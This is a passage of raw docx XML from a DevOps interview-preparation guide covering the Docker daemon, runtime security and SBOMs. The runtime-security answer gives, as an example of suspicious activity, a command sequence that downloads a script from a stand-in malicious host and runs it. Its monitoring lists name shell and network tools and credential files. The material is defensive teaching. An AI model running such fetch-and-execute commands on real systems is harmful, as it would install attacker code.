        <w:t>Creates and manages:</w:t>
        <w:br/>
        <w:t>Bridge Networks</w:t>
        <w:br/>
        <w:t>Host Networks</w:t>
        <w:br/>
        <w:t>Overlay Networks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Volume Management</w:t>
        <w:br/>
        <w:t>Handles persistent storage:</w:t>
        <w:br/>
        <w:t>docker volume create</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. API Server</w:t>
        <w:br/>
        <w:t>The daemon exposes a REST API used by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Compose</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CI/CD tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Third-party integrations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Daemon Process</w:t>
        <w:br/>
        <w:t>Check status:</w:t>
        <w:br/>
        <w:t>systemctl status docker</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>ps -ef | grep dockerd</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>/usr/bin/dockerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Communication with Docker Daemon</w:t>
        <w:br/>
        <w:t>Default socket:</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t>Docker CLI communicates through this Unix socket.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>dockerd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security Consideration</w:t>
        <w:br/>
        <w:t>Access to:</w:t>
        <w:br/>
        <w:t>/var/run/docker.sock</w:t>
        <w:br/>
        <w:t>effectively grants Docker administrative privileges.</w:t>
        <w:br/>
        <w:t>This is why membership in the Docker group should be controlled carefully.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Daemon and Container Runtime</w:t>
        <w:br/>
        <w:t>Modern Docker architecture:</w:t>
        <w:br/>
        <w:t>dockerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * dockerd → Docker management layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * containerd → Container lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runc → Creates and runs containers using Linux namespaces and cgroups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Restart Docker Daemon</w:t>
        <w:br/>
        <w:t>Linux:</w:t>
        <w:br/>
        <w:t>sudo systemctl restart docker</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker info</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>The Docker daemon, dockerd, is the core background service of Docker Engine responsible for managing containers, images, networks, and volumes. It exposes a REST API that the Docker CLI and other tools use to communicate with Docker. When a user executes commands such as docker run or docker build, the Docker daemon performs the actual operations, including image management, container lifecycle management, networking, and storage provisioning. Internally, modern Docker uses containerd and runc beneath the daemon to create and manage containers. The daemon typically listens on /var/run/docker.sock and requires careful access control because it effectively provides administrative access to the host system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q383. Explain runtime security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Runtime Security</w:t>
        <w:br/>
        <w:t>Runtime Security is the practice of monitoring, detecting, and preventing security threats while an application, container, virtual machine, or Kubernetes workload is actively running in production.</w:t>
        <w:br/>
        <w:t>Unlike static security checks (code scanning, image scanning, IaC scanning), runtime security focuses on what is happening after deployment.</w:t>
        <w:br/>
        <w:t>Why Runtime Security is Important</w:t>
        <w:br/>
        <w:t>Even if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Source code is secure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container images are scanned</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Infrastructure is hardened</w:t>
        <w:br/>
        <w:t>Attackers may still:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Exploit zero-day vulnerabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Gain unauthorized access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Execute malicious commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Escalate privileges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Move laterally across systems</w:t>
        <w:br/>
        <w:t>Runtime security helps detect and stop these activities in real time.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Imagine a containerized application running in Kubernetes.</w:t>
        <w:br/>
        <w:t>Normal behavior:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reads application files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Connects to a database</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Writes logs</w:t>
        <w:br/>
        <w:t>Suspicious behavior:</w:t>
        <w:br/>
        <w:t>wget malicious-site.com/malware.sh</w:t>
        <w:br/>
        <w:t>chmod +x malware.sh</w:t>
        <w:br/>
        <w:t>./malware.sh</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A runtime security tool detects:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected process execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network connection to unknown hosts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * File modifications</w:t>
        <w:br/>
        <w:t>and immediately:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Generates an alert</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kills the process</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Isolates the container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Runtime Security in Kubernetes</w:t>
        <w:br/>
        <w:t>Common threats:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Privilege escalation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Container escape attempts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Reverse shells</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Cryptomining malware</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Unauthorized network access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Suspicious process execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Sensitive file access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Runtime Security Controls</w:t>
        <w:br/>
        <w:t>1. Process Monitoring</w:t>
        <w:br/>
        <w:t>Track processes running inside containers.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>bash</w:t>
        <w:br/>
        <w:t>sh</w:t>
        <w:br/>
        <w:t>nc</w:t>
        <w:br/>
        <w:t>curl</w:t>
        <w:br/>
        <w:t>wget</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Alert if unexpected processes start.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. File Integrity Monitoring</w:t>
        <w:br/>
        <w:t>Monitor critical files:</w:t>
        <w:br/>
        <w:t>/etc/passwd</w:t>
        <w:br/>
        <w:t>/etc/shadow</w:t>
        <w:br/>
        <w:t>/etc/ssh/</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Detect unauthorized modifications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Network Monitoring</w:t>
        <w:br/>
        <w:t>Detect:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Connections to malicious IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unusual outbound traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lateral movement</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Behavior Anomaly Detection</w:t>
        <w:br/>
        <w:t>Learn normal workload behavior and alert when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * New process appears</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected port opens</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Abnormal traffic occurs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Threat Detection</w:t>
        <w:br/>
        <w:t>Detect:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cryptominers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reverse shells</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rootkits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Known attack patterns</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Runtime Security Tools</w:t>
        <w:br/>
        <w:t>Tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Falco</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes runtime threat detection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sysdig Secure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime security and compliance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Aqua Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container and runtime protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prisma Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud workload protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CrowdStrike Falcon</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Endpoint and workload security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microsoft Defender for Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud workload protection</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Falco Example</w:t>
        <w:br/>
        <w:t>Falco watches Linux system calls.</w:t>
        <w:br/>
        <w:t>Rule:</w:t>
        <w:br/>
        <w:t>- rule: Terminal shell in container</w:t>
        <w:br/>
        <w:t xml:space="preserve">  condition: container and shell_procs</w:t>
        <w:br/>
        <w:t xml:space="preserve">  output: Shell spawned in container</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Alert:</w:t>
        <w:br/>
        <w:t>Shell spawned in container</w:t>
        <w:br/>
        <w:t>User=root</w:t>
        <w:br/>
        <w:t>Container=payment-service</w:t>
        <w:br/>
        <w:t>Process=bash</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This indicates someone opened a shell inside a production container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Runtime Security vs Image Scanning</w:t>
        <w:br/>
        <w:t>Image Scanning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds CVEs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds active attacks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static analysis</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Real-time monitoring</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks running workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Preventive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Detective &amp; responsive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (2-Minute Version)</w:t>
        <w:br/>
        <w:t>Runtime security is the practice of monitoring and protecting applications, containers, VMs, and Kubernetes workloads while they are actively running in production. It focuses on detecting threats such as privilege escalation, unauthorized process execution, container escapes, reverse shells, and suspicious network activity. In Kubernetes environments, tools like Falco, Sysdig Secure, Aqua Security, and Prisma Cloud monitor system calls, file changes, and network behavior to identify attacks in real time. Runtime security complements image scanning and vulnerability management by protecting workloads after deployment and enabling rapid detection and response to security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q384. What is seccomp?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q385. Explain AppArmor.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q386. What is SELinux?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q387. Who created the image (authenticity)</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q388. What is Notary?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q389. Explain SBOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is SBOM?</w:t>
        <w:br/>
        <w:t>SBOM (Software Bill of Materials) is a complete inventory of all components, libraries, dependencies, packages, and modules used to build a software application or container image.</w:t>
        <w:br/>
        <w:t>Think of it like an ingredient list on a food package.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why SBOM is Important</w:t>
        <w:br/>
        <w:t>When a security vulnerability is announced, organizations need to quickly answer:</w:t>
        <w:br/>
        <w:t>"Are we using the affected library?"</w:t>
        <w:br/>
        <w:t>Without an SBOM:</w:t>
        <w:br/>
        <w:t>Search source code manually</w:t>
        <w:br/>
        <w:t>Check container images</w:t>
        <w:br/>
        <w:t>Inspect dependencies</w:t>
        <w:br/>
        <w:t>Hours or days of effort</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>With an SBOM:</w:t>
        <w:br/>
        <w:t>Search SBOM</w:t>
        <w:br/>
        <w:t>Find affected component</w:t>
        <w:br/>
        <w:t>Identify impacted applications</w:t>
        <w:br/>
        <w:t>Take action immediately</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose your application uses:</w:t>
        <w:br/>
        <w:t>Payment Service</w:t>
        <w:br/>
        <w:t>├── Spring Boot 3.2</w:t>
        <w:br/>
        <w:t>├── Log4j 2.17</w:t>
        <w:br/>
        <w:t>├── Jackson 2.15</w:t>
        <w:br/>
        <w:t>├── PostgreSQL Driver</w:t>
        <w:br/>
        <w:t>└── Apache Commons</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The SBOM records all these dependencies and their versions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example: Log4Shell</w:t>
        <w:br/>
        <w:t>During the Log4Shell Vulnerability Disclosure vulnerability:</w:t>
        <w:br/>
        <w:t>Organizations asked:</w:t>
        <w:br/>
        <w:t>Do we use Log4j?</w:t>
        <w:br/>
        <w:t>Which applications?</w:t>
        <w:br/>
        <w:t>Which versions?</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Companies with SBOMs could identify affected systems quickly.</w:t>
        <w:br/>
        <w:t>Companies without SBOMs often spent days investigating.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Information Does an SBOM Contain?</w:t>
        <w:br/>
        <w:t>Typical fields:</w:t>
        <w:br/>
        <w:t>Field</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Package Name</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Log4j</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Version</w:t>
        <w:br/>
        <w:tab/>
        <w:t>2.14.1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supplier</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Apache</w:t>
        <w:br/>
        <w:tab/>
        <w:t>License</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Apache 2.0</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Hash</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SHA256</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dependencies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Other libraries</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Component Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Library, Framework, OS Package</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "log4j",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "version": "2.14.1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "supplier": "Apache",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "license": "Apache-2.0"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM for Containers</w:t>
        <w:br/>
        <w:t>Container Image:</w:t>
        <w:br/>
        <w:t>payment-service:v1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>May contain:</w:t>
        <w:br/>
        <w:t>Ubuntu Base Image</w:t>
        <w:br/>
        <w:t>OpenSSL</w:t>
        <w:br/>
        <w:t>Python</w:t>
        <w:br/>
        <w:t>Flask</w:t>
        <w:br/>
        <w:t>Requests</w:t>
        <w:br/>
        <w:t>NumPy</w:t>
        <w:br/>
        <w:t>Application Code</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>An SBOM lists everything inside the image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM Formats</w:t>
        <w:br/>
        <w:t>SPDX</w:t>
        <w:br/>
        <w:t>Created by the Linux Foundation.</w:t>
        <w:br/>
        <w:t>Most widely adopted format.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>SPDX Version: SPDX-2.3</w:t>
        <w:br/>
        <w:t>PackageName: log4j</w:t>
        <w:br/>
        <w:t>PackageVersion: 2.14.1</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CycloneDX</w:t>
        <w:br/>
        <w:t>Created by the OWASP Foundation.</w:t>
        <w:br/>
        <w:t>Popular in DevSecOps and container security.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SWID</w:t>
        <w:br/>
        <w:t>Software Identification Tags standard.</w:t>
        <w:br/>
        <w:t>Less common in cloud-native environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM Generation Tools</w:t>
        <w:br/>
        <w:t>Syft</w:t>
        <w:br/>
        <w:t>Generate SBOM from container image:</w:t>
        <w:br/>
        <w:t>syft nginx:latest</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Generate SPDX:</w:t>
        <w:br/>
        <w:t>syft nginx:latest -o spdx-json</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Trivy</w:t>
        <w:br/>
        <w:t>trivy image --format cyclonedx nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Creates SBOM and scans vulnerabilities.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Anchore Enterprise</w:t>
        <w:br/>
        <w:t>Enterprise SBOM and compliance management.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM in CI/CD</w:t>
        <w:br/>
        <w:t>Modern secure pipeline:</w:t>
        <w:br/>
        <w:t>Git Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Generate SBOM</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Vulnerability Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Sign Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Push Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ↓</w:t>
        <w:br/>
        <w:t>Deploy</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM and Supply Chain Security</w:t>
        <w:br/>
        <w:t>SBOM is a key requirement in modern software supply chain security.</w:t>
        <w:br/>
        <w:t>It helps with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compliance audits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * License management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Incident response</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Third-party risk assessment</w:t>
        <w:br/>
        <w:t>Frameworks that encourage SBOM usage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SLSA</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * OpenSSF</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>SBOM vs Vulnerability Scan</w:t>
        <w:br/>
        <w:t>SBOM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vulnerability Scan</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lists components</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finds vulnerabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Inventory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security assessment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shows dependencies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shows CVEs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static catalog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk analysis</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for visibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for remediation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>An SBOM does not tell you if something is vulnerable; it tells you what exists. Vulnerability scanners use the SBOM to identify affected components.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>SBOM, or Software Bill of Materials, is a detailed inventory of all software components, libraries, dependencies, and packages used in an application or container image. It provides visibility into what software is running in an environment and is essential for software supply chain security. SBOMs help organizations quickly identify impacted applications when vulnerabilities such as Log4Shell are disclosed. Common SBOM formats include SPDX and CycloneDX, and tools like Syft and Trivy can generate SBOMs as part of CI/CD pipelines. SBOMs are often combined with image signing and vulnerability scanning to strengthen DevSecOps and MLOps security practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q390. What is BuildKit?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q391. Explain Docker networking troubleshooting.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q392. What are common Docker issues?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q393. Explain container startup optimization.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q394. Design a secure container platform.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q395. Docker layer caching: How do Docker layers and cache affect build speed and image reproducibility?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q396. Docker base images: How do you choose between Ubuntu, Alpine, slim, and distroless base images?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q397. Docker non-root containers: Why should containers avoid running as root, and how do you implement that in a Dockerfile?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q398. Docker secrets: How do you prevent secrets from leaking into Docker images, build logs, and runtime environment variables?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q399. Docker registry: How do you tag, push, scan, and promote Docker images through environments?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q400. Docker troubleshooting: A container works locally but fails in Kubernetes. How would you debug entrypoint, environment variables, filesystem, permissions, and health checks?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q401. Docker networking: How does container networking work locally, and what changes when the container runs in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q402. Docker volumes: When would you use bind mounts, volumes, or ephemeral container storage?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q403. Docker Compose: When is Docker Compose useful, and why is it different from Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q404. Docker production readiness: What checks should pass before a Docker image is approved for production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q405. Scenario - registry outage during deploy: Your container registry becomes unreachable mid-deployment and half the pods are on the new image, half on the old. How do you stabilize the rollout?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
